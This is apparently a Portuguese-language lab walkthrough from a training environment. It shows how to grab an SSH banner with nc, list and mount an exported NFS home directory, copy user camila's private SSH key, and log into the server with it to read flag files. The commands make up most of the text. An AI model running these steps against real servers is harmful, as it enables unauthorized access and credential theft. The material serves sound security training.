- Monte o diretório na sua máquina usando o NFS.
- Navegue entre os diretórios após a montagem.
- Acesse o diretório SSH.
- Obtenha a chave privada.
- Faça o download da chave privada para a sua máquina.
- Utilize a chave privada com o parâmetro -i ao se conectar no servidor via SSH.
- Após a conexão, navegue na raiz do servidor e realize as ações desejadas.
Neste mesmo host analisado anteriormente existe um serviço de SSH.
Host: 172.16.1.33
Quais os métodos de autenticação aceitos no serviço de SSH?
Realizamos um banner grabbing para detectar o sistema operacional e a possível versão do servidor em execução:
nc 172.16.1.33 22 ou 2222
Após isso, identificamos o método de autenticação que está sendo utilizado e os métodos aceitos pelo servidor. Utilizamos o próprio utilitário SSH em modo verbose:
ssh -v 172.16.1.33
Confirme com yes para prosseguir. Encontre a opção "Authentications that can continue".
= Resposta do laboratório.
RESPOSTA DO VLAB
rpcinfo -p 172.16.1.5 | grep nfs
showmount -e 172.16.1.31
mkdir /tmp/nfs
Em seguida, mova o diretório encontrado /home/camila para o /tmp/nfs com o comando:
mount -t nfs -o nfsvers=2 172.16.1.31:/home/camila /tmp/nfs
Depois, navegue no diretório montado com:
ls -la /tmp/nfs
Em seguida, acesse o diretório /tmp/nfs/.ssh
Roube a chave privada e faça o download para a máquina com o comando:
cp id_rsa /home/rewind
Ao conectar-se ao servidor via SSH, use a chave da seguinte forma:
ssh -i id_rsa camila@172.16.1.31 -o HostKeyAlgorithms=+ssh-dss -o PubkeyAcceptedKeyTypes=+ssh-dss
Agora você pode navegar dentro do servidor: ir até a raiz, "/ /", etc.
ROUBANDO A CHAVE Privada:
rpcinfo -p 172.16.1.5 | grep nfs
showmount -e 172.16.1.31
mkdir /tmp/nfs
cd /tmp/nfs
ls -la /tmp/nfs
cd /tmp/nfs/.ssh
ls -la
cat id_rsa.pub
cat id_rsa
cp id_rsa /home/rewind
Ao conectar-se ao servidor via SSH, utilize a chave da seguinte forma:
ssh -i id_rsa camila@172.16.1.31 -o HostKeyAlgorithms=+ssh-dss -o PubkeyAcceptedKeyTypes=+ssh-dss
id_rsa
ls
cat key.txt
cd /root
cd /home
cd /home/anonymous
ls
cd anonymous
ls
cat key.txt
cd /home
cd /home/camila
cd //
ls
cat key.txt
Top comments (0)